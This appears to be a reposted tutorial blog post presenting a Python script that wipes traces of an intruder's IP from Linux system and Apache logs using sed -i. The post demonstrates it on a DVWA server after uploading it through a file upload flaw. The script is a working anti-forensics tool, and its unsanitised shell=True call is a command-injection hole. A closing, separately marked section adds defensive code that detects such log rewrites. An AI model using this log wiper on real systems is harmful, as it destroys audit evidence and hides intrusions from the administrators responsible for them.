Python Security Mini-Tools: Clearing Linux Log Traces
Source: Internet  Editor: 程序博客网  Published: 2024/05/19 12:16
The main flow is: define a list of log files commonly found on Linux, use os.path.exists() to check whether each one is present, and if it is, call the sed command through the subprocess library to delete every line in that log that mentions the given host, thereby clearing the traces.
First, a look at how the sed command is used on Linux:
In '/127.0.0.1/d', the d specifies a delete operation, and what gets deleted are the lines containing "127.0.0.1"; sed's -i option makes it modify the file in place. You can indeed see that every line containing "127.0.0.1" has been removed.
The script is as follows:
#coding=utf-8
import os
import sys
import subprocess

def Clear_The_Log(host):
    # Log files commonly present on a Linux host (list kept exactly as in the original post)
    logs = ["/var/log/messages", "/var/log/messages.1", "/etc/syslog.conf", "/var/log/secure",
            "/var/log/message", "/var/log/lastlog", "/var/log/auth.log", "/var/log/vsftpd.log",
            "/var/log/apache2/access.log", "/var/log/apache2/error.log", "/var/log/apache2/error.log.1",
            "/usr/local/httpd/error.log", "/apache/apache/message.log", "/var/log/apache2/access_log",
            "/var/log/apache2/error.log", "/var/log/apache2/error_log ", "/var/log/apache/access.log",
            "/var/log/apache/access_log", "/var/log/apache/error.log", "/var/log/apache/error_log",
            "/var/www/logs/error_log", " /var/www/logs/error.log", " /var/www/logs/access_log",
            "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", " /usr/local/apache/logs/error.log",
            "/usr/local/apache/logs/access_log", "usr/local/apache/logs/access.log", "/var/log/error_log",
            "/var/log/error.log", "/var/log/access_log", "/var/log/access.log",
            "/usr/local/apache/logs/error_logerror_log.old", "/usr/local/apache/logs/access_logaccess_log.old",
            "/var/log/access.log", "/var/log/access_log", "/usr/local/apache/logs/error_log",
            "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access.log", "/var/log/messages.1",
            "/var/log/messages.2", "/var/log/messages.3", "/var/log/messages.4", "/var/log/secure.1",
            "/var/log/secure.2", "/var/log/secure.3", "/var/log/secure.3", "/var/log/secure.4"]
    print "[*]Trying to find the logs of the Linux......"
    for log in logs:
        if os.path.exists(log):
            print "[+]Found the log: " + log
            # sed -i rewrites the file in place, dropping every line that contains the host string
            subprocess.call("sed -i '/%s/d' %s" % (host, log), shell=True)
            print "[+]Clear the log successfully."

def main():
    try:
        # The host must be given as the first argument; check before indexing argv
        if len(sys.argv) < 2:
            print "[*]Usage: python Linux_log_clear.py [host]\n Example: python Linux_log_clear.py 127.0.0.1"
            return
        host = sys.argv[1]
        Clear_The_Log(host)
    except Exception as e:
        print "[*]Usage: python Linux_log_clear.py [host]\n Example: python Linux_log_clear.py 127.0.0.1"

if __name__ == '__main__':
    main()
First, test it on BT5:
Then test it on the DVWA web server:
Look at DVWA's Apache access.log and find the records of requests from the physical host:
Command: vim /var/log/apache2/access.log
Then search in vim with this command: /192.168.220.1
The web access records of the physical host, 192.168.220.1, are visible.
Next, upload the script (for example by way of a file upload vulnerability) and run it:
As shown, the script found Apache's access.log and cleared it.
Now confirm the result by opening Apache's access.log again:
vim /var/log/apache2/access.log
The relevant entries can no longer be found: the web access records for host 192.168.220.1 have indeed been removed, i.e. the log traces were cleared successfully.
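What this rewrite leaves behind, as an added detection example (not code from the post): sed -i filters the log into a temporary file and renames it over the original, so the log's inode changes and it shrinks, which an append-only log never does. The access-log lines are constructed sample input, and rewrite_without() reproduces the in-place edit on a scratch file so the detector has something to compare.

```python
import os
import tempfile

# Constructed Apache access-log lines (sample input, not taken from the post).
SAMPLE_LOG = (
    '192.168.220.1 - - [01/Jan/2024:10:00:00 +0000] "GET /login.php HTTP/1.1" 200 512\n'
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 1024\n'
    '192.168.220.1 - - [01/Jan/2024:10:00:02 +0000] "POST /upload.php HTTP/1.1" 200 77\n'
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /about.php HTTP/1.1" 200 900\n'
)

def log_state(path):
    """Snapshot the attributes a rewrite disturbs but a normal append never does."""
    st = os.stat(path)
    with open(path, "rb") as f:
        lines = sum(1 for _ in f)
    return {"inode": st.st_ino, "size": st.st_size, "lines": lines}

def tamper_indicators(before, after):
    """Compare two snapshots of one log; an untouched log only grows and keeps its inode."""
    findings = []
    if after["inode"] != before["inode"]:
        findings.append("inode changed: file was replaced, which is how sed -i writes")
    if after["size"] < before["size"]:
        findings.append("size shrank from %d to %d bytes" % (before["size"], after["size"]))
    if after["lines"] < before["lines"]:
        findings.append("line count dropped from %d to %d" % (before["lines"], after["lines"]))
    return findings

def rewrite_without(path, needle):
    """Reproduce the effect of sed -i '/needle/d' on a scratch file: filter to a temp file, rename over."""
    tmp = path + ".tmp"
    with open(path) as src, open(tmp, "w") as dst:
        dst.writelines(line for line in src if needle not in line)
    os.replace(tmp, path)

def demo():
    """Write the sample log to a scratch directory, rewrite it as the post's script would, and diff."""
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, "access.log")
    with open(path, "w") as f:
        f.write(SAMPLE_LOG)
    before = log_state(path)
    rewrite_without(path, "192.168.220.1")
    after = log_state(path)
    os.remove(path)
    os.rmdir(workdir)
    return before, after, tamper_indicators(before, after)
```

On a real host a file-integrity monitor or an audit rule watching rename() and unlink() under /var/log surfaces the same signal, since the rewritten log is a new file rather than the one the daemon had open.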